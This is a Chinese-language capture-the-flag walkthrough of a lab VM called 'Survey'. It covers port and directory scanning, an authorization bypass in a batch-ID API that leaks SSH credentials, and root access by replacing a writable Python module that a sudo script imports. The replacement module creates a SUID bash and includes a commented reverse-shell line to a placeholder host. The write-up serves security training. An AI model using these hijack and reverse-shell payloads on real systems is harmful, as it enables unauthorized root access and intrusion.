Mazesec_Survey

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24                                  
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 09:14 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0017s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0013s latency).
MAC Address: 08:00:27:55:C9:D8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.77
Host is up (0.00054s latency).
MAC Address: 08:00:27:C5:54:53 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.04 seconds

靶机IP：192.168.2.77

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.77                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 09:14 +0800
Nmap scan report for 192.168.2.77
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:C5:54:53 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds

开放端口：``

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,3000 192.168.2.77 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 09:15 +0800
Nmap scan report for 192.168.2.77
Host is up (0.0068s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open  http    Werkzeug httpd 1.0.1 (Python 3.9.2)
|_http-server-header: Werkzeug/1.0.1 Python/3.9.2
| http-title: Maze\xE5\x9B\xA2\xE9\x98\x9F\xE6\x88\x90\xE5\x91\x98\xE4\xBF\xA1\xE6\x81\xAF\xE8\xB0\x83\xE6\x9F\xA5
|_Requested resource was http://192.168.2.77:3000/fill
MAC Address: 08:00:27:C5:54:53 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.14 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.77                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 09:15 +0800
Nmap scan report for 192.168.2.77
Host is up (0.023s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:C5:54:53 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.42 seconds

二、WEB渗透

1、80端口

进行目录扫描，没有发现有价值的东西

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.77 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.77
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 6]
server-status        (Status: 403) [Size: 277]
Progress: 1184970 / 1323348 (89.54%)^C

2、3000端口

访问3000端口，是一个成员信息调查

进行目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.77:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.77:3000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              html,js,txt,bak,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
view                 (Status: 400) [Size: 12]
api                  (Status: 200) [Size: 80]
fill                 (Status: 200) [Size: 1583]
Progress: 1323348 / 1323348 (100.00%)
===============================================================
Finished
===============================================================

再次对api进行目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# dirsearch -u http://192.168.2.77:3000/api
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/miaosec/reports/http_192.168.2.77_3000/_api_26-03-03_10-26-25.txt

Target: http://192.168.2.77:3000/

[10:26:25] Starting: api/
[10:27:14] 400 -   33B  - /api/export

Task Completed

找到一个export参数，进行访问，提示我们缺少id参数

添加后进行访问，发现没有权限

访问我们刚才所添加的id，提示我们可以批量进行查询

经过测试发现只对第一个ID进行鉴权，后面的ID就不会进行鉴权，尝试进行批量查询，最后在id=6时，找到一个账号和密码：x3x:p@ssw0rd_x3x

使用凭证进行连接，成功获取到x3x的权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh x3x@192.168.2.77       
The authenticity of host '192.168.2.77 (192.168.2.77)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
    ~/.ssh/known_hosts:7: [hashed name]
    ~/.ssh/known_hosts:8: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:13: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
    ~/.ssh/known_hosts:21: [hashed name]
    (2 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.77' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
x3x@192.168.2.77's password: 
Linux Survey 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
x3x@Survey:~$ id
uid=1001(x3x) gid=1001(x3x) groups=1001(x3x)

四、权限提升

查看sudo -l

x3x@Survey:~$ sudo -l
Matching Defaults entries for x3x on Survey:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User x3x may run the following commands on Survey:
    (root) NOPASSWD: /usr/bin/python3 /opt/maze_admin/generate_report.py
x3x@Survey:~$ ls -al /opt
total 16
drwxr-xr-x  4 root root 4096 Feb 23 07:21 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  3 root x3x  4096 Feb 23 07:21 maze_admin
drwxr-xr-x  3 root root 4096 Mar  2 21:22 maze_web
x3x@Survey:/opt$ cd maze_admin/
x3x@Survey:/opt/maze_admin$ ls -la
total 16
drwxr-xr-x 3 root x3x  4096 Feb 23 07:21 .
drwxr-xr-x 4 root root 4096 Feb 23 07:21 ..
-rwxr-xr-x 1 root root  297 Feb 24 03:36 generate_report.py
drwxrwxr-x 2 root x3x  4096 Feb 23 07:23 libs

查看文件generate_report.py的内容，发现会加载一个自定义的格式化组件report_formatter

x3x@Survey:/opt/maze_admin$ cat generate_report.py 
import os
import sys
import time
sys.path.insert(0, "/opt/maze_admin/libs")

# 加载自定义的格式化组件
import report_formatter

print("[*] 正在启动 Maze 团队日志分析模块...")
time.sleep(1)
report_formatter.print_header()

print("[*] 分析完成，未发现异常日志。")

查看组件的内容

x3x@Survey:/opt/maze_admin/libs$ cat report_formatter.py 
def print_header():
    print("---------------------------------")
    print("    Maze Team Security Report    ")
    print("---------------------------------")

可以进行删除，那么就将原本的文件删除，重新新增一个恶意的文件

x3x@Survey:/opt/maze_admin/libs$ rm report_formatter.py 
rm: remove write-protected regular file 'report_formatter.py'? y
x3x@Survey:/opt/maze_admin/libs$ ls -la
total 8
drwxrwxr-x 2 root x3x 4096 Mar  2 21:39 .
drwxr-xr-x 3 root x3x 4096 Feb 23 07:21 ..
x3x@Survey:/opt/maze_admin/libs$ cat > report_formatter.py << 'EOF'
> import os
> import pty
> 
> def print_header():
>     # 原始功能可以保留（可选）
>     print("=== Maze Admin Report ===")
> 
>     # 执行提权 payload
>     # 方法1：直接启动 root shell（如果终端支持）
>     # os.execl("/bin/bash", "bash", "-p")
> 
>     # 方法2：反弹 shell（推荐，如果你有监听）
>     # os.system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'")
> 
>     # 方法3：创建一个 SUID 的 bash（更通用）
>     os.system("cp /bin/bash /tmp/rootbash")
>     os.system("chmod u+s /tmp/rootbash")
> EOF

执行恶意文件

x3x@Survey:/opt/maze_admin/libs$ sudo /usr/bin/python3 /opt/maze_admin/generate_report.py
[*] 正在启动 Maze 团队日志分析模块...
=== Maze Admin Report ===
[*] 分析完成，未发现异常日志。
x3x@Survey:/opt/maze_admin/libs$ ls -la /tmp
total 1184
drwxrwxrwt 10 root root    4096 Mar  2 21:40 .
drwxr-xr-x 18 root root    4096 Mar 18  2025 ..
drwxrwxrwt  2 root root    4096 Mar  2 20:14 .ICE-unix
drwxrwxrwt  2 root root    4096 Mar  2 20:14 .Test-unix
drwxrwxrwt  2 root root    4096 Mar  2 20:14 .X11-unix
drwxrwxrwt  2 root root    4096 Mar  2 20:14 .XIM-unix
drwxrwxrwt  2 root root    4096 Mar  2 20:14 .font-unix
-rwsr-xr-x  1 root root 1168776 Mar  2 21:40 rootbash
drwx------  3 root root    4096 Mar  2 20:14 systemd-private-6ac946ba56fc4954acf80b7bad7ea474-apache2.service-mi5Mxh
drwx------  3 root root    4096 Mar  2 20:14 systemd-private-6ac946ba56fc4954acf80b7bad7ea474-systemd-logind.service-5CgXxf
drwx------  3 root root    4096 Mar  2 20:14 systemd-private-6ac946ba56fc4954acf80b7bad7ea474-systemd-timesyncd.service-ap47gi

成功获取到root权限

x3x@Survey:/opt/maze_admin/libs$ /tmp/rootbash -p
rootbash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
rootbash-5.0# id
uid=1001(x3x) gid=1001(x3x) euid=0(root) groups=1001(x3x)

五、查看FALG

rootbash-5.0# cat /root/root.txt /home/x3x/user.txt 
flag{root-866fa8a4-b5bc-4907-b549-b89a024f5f47}
flag{user-cafa5f8b-6a6f-4ae5-9fe7-6a734e378acd}